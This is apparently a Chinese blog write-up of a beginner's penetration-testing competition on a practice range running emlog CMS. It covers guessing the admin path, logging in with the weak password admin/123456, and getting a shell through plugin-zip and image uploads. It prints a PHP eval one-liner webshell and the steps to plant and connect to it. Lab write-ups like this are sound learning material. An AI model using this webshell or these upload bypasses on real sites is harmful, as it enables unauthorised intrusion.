记一次渗透竞赛中的思路笔记~

因为是一次做渗透而且又是靶场，所以信息搜集也就没有做，拿到靶场网址后直接打开网页看看有什么东西，发现了一个登录口，想着有登录那就有注册，所以思路就出来了：注册→登录-修改密码（越权）

但是注册成功后登录进去就跳转到首页了，连后台都没有更别提修改密码了，所以只好在找找其他的利用点，这个时候群里的其他哥哥们都说进后台了！

看到这里，我突然灵光一闪思路瞬间清晰无比，首先比赛开始到现在最多5分钟，其他哥哥们说已经进后台了，从这里可以看出后台地址肯定不会很难，先在路径用默认的admin猜测一下：

ok，我们后台已经找到

继续分析，经过这么短的时间其他哥哥们已经进入后台了，那么账号密码肯定不会很难，所以是弱口令的几率是非常大的！

那么我们为了节省时间可以先尝试手工测一下：admin/admin、admin/123456、admin/admin123、admin/admin666、等常用弱口令。

经过测试通过admin/123456登陆成功

果然我还是太年轻了，进入后台之后我们肯定不能就这么结束嘛，拿shell！拿shell！

第一次做渗透就轻而易举的进入后台了，说不紧张是假的，经过层层查看，发现几个上传点，如下：

上传点1 - 个人设置-修改头像

上传点2 - 编辑文章-上传附件

上传点3 - 备份数据-导入备份

上传点4 - 图册管理-上传图片

上传点5 - 插件管理-上传插件

我们总共找到五个上传点，经过测试，最后发现有两个上传点是可以使用。

上传点5：我们可以通过页面提示发现要求我们上传zip压缩文件，那么我们应该可以理解为，当我们上传zip压缩文件后，系统会对zip文件进行解压！如果思路成立，那么我们可以直接Getshell，想到就做，先找到一句话代码

<?php @eval($_POST[pass]);?>

将一句话木马写到php文件内，并且百度搜索一个emlogcms系统的插件，然后把一句话木马php压缩进去，之后再上传！

如果没有waf的情况下，那么他就会顺便把我们的shell文件也给解压出来。

上传成功

然后我们百度搜索emlogcms的插件路径为：/content/plugins/，我们直接扔菜刀进行连接

拿到shell

上传点4：这个上传点属于简单的。

我们进入后台之后点击图册专辑。

然后我们上传一个jpg图片文件，通过burp抓包修改图片内容为一句话代码，并且将后缀修改为php即可上传成功。

之后我们点击查看原图即可跳转到这这个文件的路径，我们放在菜刀内直接连接即可

当我们拿到shell之后根据阿浪的提示，可以发现

etcetra directory在百度上搜索的结果为linux根目录下的/etc文件夹

那么我们通过菜刀进入etc文件就可以拿到flag

就这样，这次小竞赛结束了，结束后也看了看其他哥哥们的渗透笔记，发现思路也都差不多，而且还有个哥哥做了一下代码审计发现后台存在一个反弹xss漏洞：

后台反弹xss漏洞